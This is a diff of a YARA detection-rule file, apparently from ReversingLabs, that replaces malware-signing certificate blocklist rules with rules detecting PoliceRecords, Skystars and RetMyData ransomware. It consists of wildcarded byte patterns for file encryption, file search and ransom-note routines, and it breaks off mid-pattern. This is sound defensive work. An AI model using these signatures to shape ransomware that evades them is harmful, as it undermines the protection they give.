+            50 8B 4D ?? 51 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 10 8B 45 ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B
+            4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 1D 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 E8
+            ?? ?? ?? ?? 8B E5 5D C2 ?? ??
+        }
+		$dd_acquirecontext = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 0B 8B 45 ?? 0D ?? ?? ?? ?? 89 45 ?? C7 45 ??
+            ?? ?? ?? ?? 83 7D ?? ?? 75 07 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 45 ?? 50 6A ?? 6A ?? 6A ?? 8D 4D ?? 51 E8 ?? ?? ??
+            ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 39 8B 45 ?? 83 C8 ?? 50 6A ?? 8B 4D
+            ?? 51 8D 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 1A 6A ?? 6A ?? 6A ?? 8D 4D ?? 51 8D 55 ?? 52 FF 15 ?? ?? ?? ??
+            85 C0 75 02 EB 0E 6A ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 9D 8B 45 ?? 8B E5 5D C2 ?? ??
+        }
+		$dd_mrwhite = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 64 01 00 00 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 12 83 3D ?? ?? ?? ?? ?? 74 09 83 3D ?? ?? ?? ?? ?? 75 05 E9 13
+            01 00 00 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 75 05 E9 F0 00 00 00 8B 95
+            ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74
+            05 E9 C0 00 00 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 74 09 83 BD ?? ?? ?? ?? ?? 73 05 E9 9B
+            00 00 00 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            75 02 EB 72 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 02 83 C0 ?? 3B 85 ?? ?? ?? ?? 76 02 EB 51 8B 8D ??
+            ?? ?? ?? 83 39 ?? 74 3E 0F B7 95 ?? ?? ?? ?? 83 FA ?? 75 32 8B 85 ?? ?? ?? ?? 8B 08 51 8B 95 ?? ?? ?? ?? 83 C2 ?? 52 6A
+            ?? 8D 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 33 C0 0F 85 CD FE FF FF 8D 8D
+            ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 45 ?? 8B E5 5D C2 ?? ??
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Incar LLC" and ( pe.signatures [ i ] . serial == "00:be:77:fe:5c:58:b7:a3:60:ad:d6:a3:fc:ed:4e:83:34" or pe.signatures [ i ] . serial == "be:77:fe:5c:58:b7:a3:60:ad:d6:a3:fc:ed:4e:83:34" ) and 1602530730 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $dd_ep at pe.entry_point ) and $dd_hash and $dd_getkey and $dd_destroykey and $dd_importkey and $dd_decrypt and $dd_encrypt and $dd_provparam and $dd_acquirecontext and $dd_mrwhite
 }
-
-rule REVERSINGLABS_Cert_Blocklist_F097E59809Ae2E771B7B9Ae5Fc3408D7 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Policerecords : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects PoliceRecords ransomware."
 		author = "ReversingLabs"
-		id = "1eed6f30-0648-5b8e-81ff-9f3af0f1c91d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "bacd3f98-a069-58ca-8423-01fcef7d4062"
+		date = "2022-08-02"
+		modified = "2022-08-02"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6160-L6178"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9e23ff26d3e1ea181e48fc23383e3717804858bc517a31ec508fa0753730c78e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.PoliceRecords.yara#L1-L79"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "55cb1a5d030c47abb1a9ca9970fb19b3124128e409bc9515c173c33b2bb49a16"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "PoliceRecords"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            00 72 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 06 6F ?? ?? ?? ?? 0C 04 0D 09 18 73 ?? ?? ??
+            ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 08 08 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ??
+            03 19 73 ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? D2 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ??
+            25 13 ?? 15 FE 01 16 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ??
+            ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 2A
+        }
+		$find_files = {
+            11 ?? 11 ?? 9A 13 ?? 00 00 07 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            00 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E
+            69 32 ?? 00 DE ?? 26 00 00 DE ?? 17 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 0C 16 13 ??
+            2B ?? 00 00 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 11 ?? 9A 28 ?? ?? ?? ?? 00
+            72 ?? ?? ?? ?? 08 11 ?? 9A 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ??
+            00 11 ?? 17 58 13 ?? 11 ?? 08 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 00 72 ?? ?? ?? ?? 1D 28
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1D 28 ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 7E ?? ??
+            ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ??
+            ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 16 8C
+            ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11
+            ?? 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F
+            ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ??
+            72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 00 07 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ??
+            13 ?? 11 ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 26 2A
+        }
+		$desktop_kill_tick = {
+            02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 09 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 13 ?? 07 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 07 28 ?? ?? ?? ?? 00
+            00 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 11 ?? 28 ?? ?? ?? ?? 00 00 02 7B ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 2A
+        }
+		$drop_ransom_note = {
+            00 16 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 00 07 72 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07
+            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 DE ?? 07 2C ??
+            07 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 26 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABEL RENOVATIONS, INC." and ( pe.signatures [ i ] . serial == "00:f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7" or pe.signatures [ i ] . serial == "f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7" ) and 1602542033 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $desktop_kill_tick ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0Cf1Ed2A6Ff4Bee621Efdf725Ea174B7 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Skystars : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Skystars ransomware."
 		author = "ReversingLabs"
-		id = "7f7ecbcd-7a92-526d-99a8-d849fffa19cb"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "9dc19bda-c5bd-58fb-8c4f-a7d8a6fbbce9"
+		date = "2020-11-20"
+		modified = "2020-11-20"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6180-L6196"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7030c122905105c72833cfcb41692bd9a67cf456e3309afce0b8f9e65c6aa5c1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Skystars.yara#L1-L97"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "352d22183b0974908ce684725fe85b4714ac5959c3bddf093b54383195881a5a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Skystars"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50
+            6A ?? 6A ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB
+            74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
+            83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8B 5D
+            ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
+            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A
+            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ??
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF 33
+        }
+		$search_files_p2 = {
+            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ??
+            ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ??
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4
+            ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ??
+            ?? EB ?? B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8B 5D ?? FF
+            33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D
+            ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ??
+            6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74
+            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
+        }
+		$encrypt_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03
+            85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68
+            ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF
+            33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? 68 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ??
+            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ??
+            85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
+            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0
+            75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74
+            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
+        }
+		$main_routine = {
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ??
+            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D
+            ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50
+            E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 89 45
+            ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
+            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ??
+            85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEVEL LIST SP Z O O" and pe.signatures [ i ] . serial == "0c:f1:ed:2a:6f:f4:be:e6:21:ef:df:72:5e:a1:74:b7" and 1603036100 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $main_routine ) and ( all of ( $search_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1249Aa2Ada4967969B71Ce63Bf187C38 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Retmydata : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects RetMyData ransomware."
 		author = "ReversingLabs"
-		id = "5b2876a2-8dfa-5456-a615-4ea69df53422"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "f7a091d9-7ace-5aad-95b4-d5101fa7fdea"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6198-L6214"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f84568cfe6304af0307a34bfed6dd346a74e714005b5e6f22a354b14f853ec65"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.RetMyData.yara#L1-L79"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "54ce38d75e9ab82a77b9c338f75e180e19ac745f149289c7478a4aa3b44d70fd"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "RetMyData"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 89 E5 57 56 53 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 29 C4 8D 9D ?? ?? ?? ?? 8B 04 04
+            C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 89 44 24 ?? 89 C7 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 40 51 51 0F 84 ?? ?? ?? ?? 8D
+            B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 85
+            C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 85 C0 74 ?? F6 85 ?? ?? ??
+            ?? ?? 89 74 24 ?? 89 7C 24 ?? 74 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ??
+            89 D8 E8 ?? ?? ?? ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 89 D8 E8 ?? ?? ?? ?? 85 C0 75 ?? 89 D8 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44
+            24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 52 52 0F 85 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 50 8D 65 ?? 5B 5E 5F 5D C3 55 BA ?? ?? ?? ?? 89
+            E5 53 51 89 C3 E8 ?? ?? ?? ?? 48 74 ?? 5A 89 D8 5B 5D E9 ?? ?? ?? ?? 58 5B 5D C3
+        }
+		$enum_resources = {
+            55 89 E5 57 56 53 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 29 C4 8D 95 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 8B 04 04 C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ??
+            83 EC ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 31 F6 89
+            44 24 ?? 8D 85 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ??
+            ?? ?? ?? 83 EC ?? 3B B5 ?? ?? ?? ?? 7D ?? 83 7B ?? ?? 75 ?? 8B 43 ?? C7 44 24 ?? ??
+            ?? ?? ?? 89 3C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 F8 E8 ?? ?? ?? ?? 89 D8 46 83 C3 ??
+            E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 50 8D 65 ?? 5B 5E 5F
+            5D C3
+        }
+		$encrypt_files = {
+            55 89 E5 57 56 53 89 C3 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
+            C0 89 C2 A3 ?? ?? ?? ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 31
+            C0 89 D7 F3 AB 85 DB 75 ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ??
+            ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 5C 24 ?? 8D 9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 89 3C
+            24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C
+            24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34
